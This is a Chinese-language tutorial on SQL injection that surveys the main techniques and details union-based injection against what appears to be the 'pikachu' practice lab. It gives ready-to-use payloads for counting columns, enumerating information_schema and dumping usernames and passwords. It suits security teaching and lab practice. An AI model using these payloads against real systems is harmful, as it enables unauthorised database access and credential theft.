## 注入攻擊的攻擊手法 主要有：聯合查詢（union）注入、布爾盲注(base on boolian)、時間盲注(base on time)、報錯信息注入、寬字節注入、偏移注入等。 ## 聯合查詢（union）注入 所謂聯合查詢注入即是使用union合并**兩個或多個**SELECT語句的結果集，第二個語句中就包含我們想要查詢的語句 ```SQL # payload a' union select database(),user(),version() #% ``` ### 先使用order by確定字段個數 **union 操作符一般與 order by 語句配合使用來確定可以查詢的字段個數** >因為查詢的字段不能超過主查詢的字段，可以先在 SQL 語句后面加 order by 進行排序，通過報錯內容確定到底有幾個字段可供使用 ~~~sql #采用二分法找到最大的可排序列，即是可查詢的字段個數 a' order by 4 #% # 假定最后4不報錯，5報錯，則可確定有4個字段,payload可以這樣 a' union select database(),user(),version(),4 #% # 如果第二個字段才能顯示在屏幕上，那么payload需這樣湊成四個字段 a' union select 1,username,3,4 from user #% ~~~ ## information_schema 注入 information_schema數據庫是MySQL5.0及以上系統自帶的數據庫。其中保存著關于MySQL服務器所維護的所有其他數據庫的信息。 如果我們用于注入的賬號，有能夠讀取該庫的權限，那么我們離脫褲就非常非常近了 ### information_schema中的常用表 ~~~sql information_schema.tables #該庫中保存其他庫表名字的表 table_schema #上表中，保存庫名的列 table_name #上表中，保存表名的列 information_schema.columns #改表中保存每個表的列名 table_name #上表中，保存表名的列 column_name #上表中，保存列名的列 ~~~ ### 一次完整的拆解獲取過程 按照數據庫的庫-表-字段這個層次性進行一步步滲透 ~~~sql #1 先通過union找出數據庫的名稱 a' union select database(),user(),3 #% #2 得到要爆破的數據庫名pikachu后，獲取相關表名 u' union select table_schema ,table_name,3 from information_schema.tables where table_schema='pikachu' #% #3 獲取表名后，查詢columns表獲取字段名 k' union select table_name,column_name,3 from information_schema.columns where table_name='users' #% #4 最后通過具體表獲取相關數據 kobe 'union select username ,password,3 from users #% ~~~